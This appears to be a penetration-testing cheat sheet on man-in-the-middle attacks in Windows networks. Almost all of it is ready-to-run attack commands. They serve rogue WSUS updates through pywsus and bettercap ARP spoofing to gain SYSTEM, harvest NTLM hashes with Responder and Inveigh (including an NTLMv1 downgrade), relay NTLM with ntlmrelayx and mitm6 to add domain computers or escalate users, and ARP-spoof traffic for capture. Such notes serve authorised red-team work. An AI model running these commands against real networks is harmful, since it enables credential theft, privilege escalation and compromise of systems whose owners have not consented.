Skip to main content

MITM

WSUS HTTP misconfiguration​

Requirements​

  1. Possibility to have MiTM position with the vulnerable host
  2. Communication between the victim and the WSUS server is over HTTP
info

If you have user access on the victim machine, it will permit to get SYSTEM privileges.

If the poisoning does not work (different broadcast domains) and you have access to victim machine, you can attempt to setup a system proxy manually (attacker IP and port 8530). The proxy redirection of the port 8530 will still be needed.

You can also spoof other machines, but you depend on the update frequency.

Check registry on WSUS client machine​

Protocol should be HTTP in key WUServer. Example of vulnerable URL:http://wsus-server.local:8530.

REG QUERY "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate"

Check that the computer uses WSUS for update, and the update policy.

REG QUERY "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU"

GPO alternative: Group Policy–Windows Components > Windows Update > Specify intranet Microsoft update service location.

Tooling install​

Install from https://github.com/GoSecure/pywsus.

Activate venv if used during setup.

source ./venv/bin/activate

Start WSUS rogue server​

Ensure PsExec64.exe is in pywsus current directory (WSUS will only accept MS signed binary).

python3 pywsus.py -H <ATTACKER_IP> -p 8530 -e PsExec64.exe -c '/accepteula /s cmd.exe /c "whoami > C:\\poc.txt" '

MiTM position​

Content of wsus.cap:

set arp.spoof.targets <COMMA_SEPARATED_LIST_OF_TARGETS_IP_OR_MAC>
arp.spoof on
set any.proxy.src_port 8530
set any.proxy.dst_port 8530
set any.proxy.dst_address <ATTACKER_IP>
any.proxy on

Start poisoning.

sudo bettercap -i <IFACE> --caplet wsus.cap

Responder​

tip

Set challenge to 1122334455667788 in /etc/responder/Responder.conf.

The option -f may prevent challenge-response capture.

Passive mode

responder -I <interface> -A

Active mode

responder -I <interface> -wrf

Aggressive mode

responder -I eth0 -wrf -F -P --lm >> responder.txt
grep -a "NTLMv1 Hash" responder.txt | awk -F ": " '{print $2}'
grep -a "NTLMv" responder.txt | grep Hash
grep -a "NTLMv1 Hash" responder.txt | awk -F ": " '{print $2}' | awk -F ":" '{print $1 "::::" $5 ":" $6}'

Hardcore mode

responder -I eth0 -wrfb -F -P --lm >> responder.txt
grep -a -i password responder.txt -B3

NTLM​

NTLM MITM attacks​

tip

Inveigh can be executed without elevated privileges but certain features such as LLMNR spoofer will not be able to start. Be sure that used ports are allowed by the local firewall.

Sniffer

Invoke-Inveigh -ConsoleOutput Y
Invoke-Inveigh -ConsoleOutput N -RunTime 15 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y
Stop-Inveigh

Packet can be captured in order to extract the hashes

netsh trace start scenario=NetConnection capture=yes persistent=no maxSize=100MB traceFile=C:\NetTrace2.etl

NTLMv1 downgrade attack

misc::easyntlmchall

NTLM Relay​

tip

SMB signing has to be disable for this kind of attack. On Windows 10 machines IPv6 is prefered as IPv4.

Invoke-InveighRelay -ConsoleOutput Y -StatusOutput N -Target <ip> -Command "<cmd>" -Attack Enumerate,Execute,Session
cme smb <CIDR> --gen-relay-list smbrelay.txt
responder -I <interface> -r -d -w
ntlmrelayx.py -tf smbrelay.txt

Add computer start BH (not tested)

ntlmrelayx.py -t ldaps://<dc_fqdn> --add-computer
python bloodhound.py -d <domain> -u <computer>\$ -p '<password>'

Priv exchange (not tested)

ntlmrelayx.py -t ldap://<dc_fqdn> --escalate-user <user>

python privexchange.py -ah <fqdn> <dc_fqdn> -u <user> -d <domain>

IPv6

mitm6 -d <fqdn>
ntlmrelayx.py -wh <webserver_hosting_wpad>:80 -t smb://<target_ip>/ -i

ARP Spoofing​

Without Gateway

sysctl -w net.ipv4.ip_forward=1
arpspoof -i eth0 <target>
tcpdump -i eth0 -S 65535 -w out.pcap -vv

With Gateway

sysctl -w net.ipv4.ip_forward=1
arpspoof -t <target> <gateway>
tcpdump -i eth0 -S 65535 -w out.pcap -vv